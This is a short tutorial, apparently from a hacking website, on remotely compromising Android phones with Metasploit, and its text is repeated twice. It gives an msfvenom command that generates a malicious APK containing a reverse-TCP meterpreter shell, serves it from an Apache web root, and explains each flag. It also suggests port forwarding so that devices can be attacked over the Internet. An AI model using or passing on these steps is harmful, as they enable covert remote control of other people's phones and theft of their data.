Hacking Android phone remotely using Metasploit
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Step by step TutorialGenerating a Payload with msfvenom At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding. After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command: # msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R> /var/www/html/ehacking.apk
This would take some time to generate an apk file of almost ten thousand bytes. |
Step by step Tutorial
Generating a Payload with msfvenom
At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.
After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:
# msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R> /var/www/html/ehacking.apk
- -p indicates a payload type
- android/metepreter/reverse_tcp specifies a reverse meterpreter shell would come in from a target Android device
- LHOST is your local IP
- LPORT is set to be as a listening port
- R> /var/www/html would give the output directly on apache server
- apk is the final name of the final output
This would take some time to generate an apk file of almost ten thousand bytes.
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